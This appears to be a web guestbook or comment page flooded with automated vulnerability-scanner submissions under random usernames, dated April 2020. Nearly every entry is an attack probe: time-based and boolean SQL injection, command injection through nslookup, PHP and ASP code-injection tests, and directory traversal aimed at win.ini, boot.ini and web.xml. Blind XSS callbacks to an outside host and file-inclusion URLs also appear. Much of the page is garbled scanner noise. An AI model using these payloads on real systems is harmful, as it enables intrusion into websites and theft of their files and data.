ftlblymn Monday, April 06, 2020 05:50
�'�"
ftlblymn
ftlblymn Monday, April 06, 2020 05:57
1
ftlblymn
ftlblymn Monday, April 06, 2020 05:57
fg030rDk')); waitfor delay '0:0:16' --
ftlblymn
ftlblymn Monday, April 06, 2020 05:57
$(nslookup H2QmWRxA)
ftlblymn
ftlblymn Monday, April 06, 2020 05:57
';print(md5(acunetix_wvs_security_test));$a='
ftlblymn
ftlblymn Monday, April 06, 2020 05:58
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:04
uy31vS4t
ftlblymn
ftlblymn Monday, April 06, 2020 06:04
set|set&set
ftlblymn
ftlblymn Monday, April 06, 2020 06:04
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:04
http://hit8LypctroTq.bxss.me/
ftlblymn
ftlblymn Monday, April 06, 2020 06:10
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:11
1
response.write(9824169*9290334)
response.write(9824169*9290334) Monday, April 06, 2020 06:17
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:17
-1 OR 2+294-294-1=0+0+0+1 --
ftlblymn
ftlblymn Monday, April 06, 2020 06:18
1
djbmixir
djbmixir Monday, April 06, 2020 06:20
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:24
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:25
${10000067+9999667}
ftlblymn
ftlblymn Monday, April 06, 2020 06:25
http://testasp.vulnweb.com/t/xss.html?%00.jpg
ftlblymn
ftlblymn Monday, April 06, 2020 06:25
H9OuN2YP'));select pg_sleep(6); --
ftlblymn
ftlblymn Monday, April 06, 2020 06:25
CPGoGSnA'));select pg_sleep(0); --
ftlblymn
ftlblymn Monday, April 06, 2020 06:26
-1)); waitfor delay '0:0:9' --
ftlblymn
ftlblymn Monday, April 06, 2020 06:26
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:26
dBsRsHoL'));select pg_sleep(9); --
ftlblymn
ftlblymn Monday, April 06, 2020 06:27
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:32
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:32
-1;select pg_sleep(12); --
ftlblymn
ftlblymn Monday, April 06, 2020 06:32
-1 OR 2+626-626-1=0+0+0+1 --
ftlblymn
ftlblymn Monday, April 06, 2020 06:34
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:39
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:40
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:45
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:45
@@j7FRA
ftlblymn
ftlblymn Monday, April 06, 2020 06:45
JyI=
ftlblymn
ftlblymn Monday, April 06, 2020 06:45
1'"()&%
ftlblymn
ftlblymn Monday, April 06, 2020 06:46
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:52
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:52
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
ftlblymn
ftlblymn Monday, April 06, 2020 06:52
WEB-INF/web.xml
ftlblymn
ftlblymn Monday, April 06, 2020 06:53
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:58
1
ftlblymn
ftlblymn Monday, April 06, 2020 06:59
../../../../../../../../../../windows/win.ini%00.jpg
ftlblymn
ftlblymn Monday, April 06, 2020 06:59
1
ftlblymn
ftlblymn Monday, April 06, 2020 07:01
1
ftlblymn
ftlblymn Monday, April 06, 2020 15:46
"+response.write(9069816*9262489)+"
ftlblymn
ftlblymn Monday, April 06, 2020 15:46
1
"+response.write(9011900*9058644)+" Monday, April 06, 2020 15:55
1
ftlblymn
ftlblymn Monday, April 06, 2020 15:55
-1 OR 2+296-296-1=0+0+0+1
ftlblymn
ftlblymn Monday, April 06, 2020 15:55
-1 OR 3+296-296-1=0+0+0+1
ftlblymn
ftlblymn Monday, April 06, 2020 15:55
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
ftlblymn
ftlblymn Monday, April 06, 2020 15:55
testasp.vulnweb.com
ftlblymn
ftlblymn Monday, April 06, 2020 15:55
\
ftlblymn
ftlblymn Monday, April 06, 2020 15:55
1����
1 waitfor delay '0:0:4' --
1 waitfor delay '0:0:4' -- Monday, April 06, 2020 15:57
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:00
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:00
(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(12)))v)+"*/
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:01
JyI=
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:08
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:08
-1" OR 3+347-347-1=0+0+0+1 --
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:08
C3M2bLQC')); waitfor delay '0:0:21' --
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:08
../../../../../../../../../../windows/win.ini
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:08
../../../../../../../../../../boot.ini
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:08
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:08
http://testasp.vulnweb.com/t/xss.html?%00.jpg
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:09
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:26
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:26
-1);select pg_sleep(14); --
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:26
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:26
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:27
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:33
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:34
../../../../../../../../../../boot.ini
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:34
'"()
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:34
1����
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:57
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:57
$(nslookup JZsbusOO)
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:57
12345'"\'\");|[*%00{%0d%0a<%00>%bf%27'💩]
ftlblymn
ftlblymn Tuesday, April 07, 2020 00:57
WEB-INF\web.xml
ftlblymn
ftlblymn Tuesday, April 07, 2020 01:03
1
ftlblymn
ftlblymn Tuesday, April 07, 2020 01:10
1
djbmixir
djbmixir Tuesday, April 07, 2020 01:15
1
djbmixir
djbmixir Tuesday, April 07, 2020 01:21
1
djbmixir
djbmixir Tuesday, April 07, 2020 01:27
set|set&set
djbmixir
djbmixir Tuesday, April 07, 2020 01:27
1
djbmixir
djbmixir Tuesday, April 07, 2020 01:27
DL7uaK7K
djbmixir
djbmixir Tuesday, April 07, 2020 01:27
http://testasp.vulnweb.com/t/fit.txt%3F.jpg
djbmixir
djbmixir Tuesday, April 07, 2020 01:27
../../../../../../../../../../boot.ini
djbmixir
djbmixir Tuesday, April 07, 2020 01:33
1
djbmixir
djbmixir Tuesday, April 07, 2020 01:34
1
djbmixir
djbmixir Tuesday, April 07, 2020 01:37
testasp.vulnweb.com
djbmixir
djbmixir Tuesday, April 07, 2020 01:38
1
djbmixir
djbmixir Tuesday, April 07, 2020 01:38
'"
djbmixir
djbmixir Tuesday, April 07, 2020 01:38
1'"()&%
djbmixir
djbmixir Tuesday, April 07, 2020 01:58
1
djbmixir
djbmixir Tuesday, April 07, 2020 02:05
1
djbmixir
djbmixir Tuesday, April 07, 2020 02:21
1
djbmixir
djbmixir Tuesday, April 07, 2020 02:25
1
djbmixir
djbmixir Tuesday, April 07, 2020 02:31
1
djbmixir
djbmixir Tuesday, April 07, 2020 02:31
fua0mPdB
djbmixir
djbmixir Tuesday, April 07, 2020 02:31
../../../../../../../../../../windows/win.ini
djbmixir
djbmixir Tuesday, April 07, 2020 02:31
../../../../../../../../../../boot.ini
djbmixir
djbmixir Tuesday, April 07, 2020 02:31
../../../../../../../../../../windows/win.ini%00.jpg
djbmixir
djbmixir Tuesday, April 07, 2020 02:31
-1);select pg_sleep(27); --
djbmixir
djbmixir Tuesday, April 07, 2020 02:31
-1 OR 2+351-351-1=0+0+0+1 --
djbmixir
djbmixir Tuesday, April 07, 2020 02:31
-1 OR 3+351-351-1=0+0+0+1 --
djbmixir
djbmixir Tuesday, April 07, 2020 02:50
(select convert(int,CHAR(65)))
djbmixir
djbmixir Tuesday, April 07, 2020 02:52
1
djbmixir
djbmixir Tuesday, April 07, 2020 02:52
set|set&set
djbmixir
djbmixir Tuesday, April 07, 2020 02:52
-1; waitfor delay '0:0:10' --
djbmixir
djbmixir Tuesday, April 07, 2020 02:53
1
djbmixir
djbmixir Tuesday, April 07, 2020 02:57
1
djbmixir
djbmixir Tuesday, April 07, 2020 03:05
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:11
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:12
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:16
1
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:16
FZll4Kka
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:16
${9999791+10000360}
tjyobjbk
tjyobjbk Tuesday, April 07, 2020 03:16
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.